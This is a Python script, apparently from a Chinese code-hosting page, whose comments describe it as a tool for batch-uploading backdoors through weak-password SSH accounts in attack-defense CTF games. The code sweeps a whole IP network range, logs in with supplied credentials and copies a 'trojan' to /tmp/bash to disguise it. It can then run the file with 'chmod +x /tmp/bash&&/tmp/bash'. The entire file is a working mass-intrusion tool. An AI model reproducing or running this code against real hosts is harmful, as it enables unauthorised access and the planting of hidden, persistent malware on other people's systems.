95 lines
3.0 KiB
Python
95 lines
3.0 KiB
Python
# 本程序用于awd中弱口令账户批量上传后门
|
|
# 用的是
|
|
# 默认将程序上传至/tmp/bash以达到伪装的目的
|
|
# 通过exec参数可以设置上传后隐蔽执行
|
|
|
|
import paramiko
|
|
from scp import SCPClient
|
|
import argparse
|
|
import re
|
|
import ipaddress
|
|
import os
|
|
|
|
|
|
def Upload_Trojans(host, port, source_path, username, password, dest_path="/tmp/bash"):
|
|
ssh_client = paramiko.SSHClient()
|
|
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
|
|
ssh_client.connect(host, port, username, password)
|
|
scpclient = SCPClient(ssh_client.get_transport(), socket_timeout=15.0)
|
|
try:
|
|
scpclient.put(source_path, dest_path)
|
|
except FileNotFoundError as e:
|
|
print(e)
|
|
print("Can't find the file")
|
|
ssh_client.close()
|
|
return 0
|
|
else:
|
|
print(host + " upload success")
|
|
ssh_client.close()
|
|
return 1
|
|
|
|
|
|
def Get_Target(target):
|
|
try:
|
|
ipaddress.ip_network(target, False)
|
|
except Exception as e:
|
|
exit("The correct IP is required")
|
|
|
|
network = ipaddress.ip_network(target, False)
|
|
target_list = list(network)
|
|
for i in range(len(target_list)):
|
|
target_list[i] = str(target_list[i])
|
|
return target_list
|
|
|
|
|
|
def Get_Trojan(trojan):
|
|
if os.path.isfile(trojan):
|
|
return os.path.abspath(trojan)
|
|
else:
|
|
exit("Can't find the file")
|
|
|
|
def Exec_Backdoor(host,port,username,password):
|
|
ssh_client = paramiko.SSHClient()
|
|
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
|
|
ssh_client.connect(host, port, username, password)
|
|
try:
|
|
cmd ="chmod +x /tmp/bash&&/tmp/bash"
|
|
ssh_client.exec_command(cmd)
|
|
except CommandError as e:
|
|
print(e)
|
|
print("Can't execute the command")
|
|
ssh_client.close()
|
|
return 0
|
|
else:
|
|
print(host + " execute success")
|
|
ssh_client.close()
|
|
return 1
|
|
|
|
if __name__ == '__main__':
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('--target', required=True, help='ip address')
|
|
parser.add_argument('--trojan', required=True, help='trojan path')
|
|
parser.add_argument('--username', required=True, help='target username')
|
|
parser.add_argument('--password', required=True, help='target password')
|
|
parser.add_argument('--destpath', default="/tmp/bash",
|
|
help='destination path, default is /tmp/bash')
|
|
parser.add_argument('--port', default="22",
|
|
help="destination port, default is 22")
|
|
parser.add_argument('--exec', action='store_true',help="execute the trojan")
|
|
args = parser.parse_args()
|
|
|
|
target_list = Get_Target(args.target)
|
|
trojan = Get_Trojan(args.trojan)
|
|
username = args.username
|
|
password = args.password
|
|
dest_path = args.destpath
|
|
port = args.port
|
|
|
|
if args.exec:
|
|
for host in target_list:
|
|
Upload_Trojans(host, port, trojan, username, password, dest_path)
|
|
Exec_Backdoor(host, port, username, password)
|
|
else:
|
|
for host in target_list:
|
|
Upload_Trojans(host, port, trojan, username, password, dest_path)
|
粤公网安备44010602013451号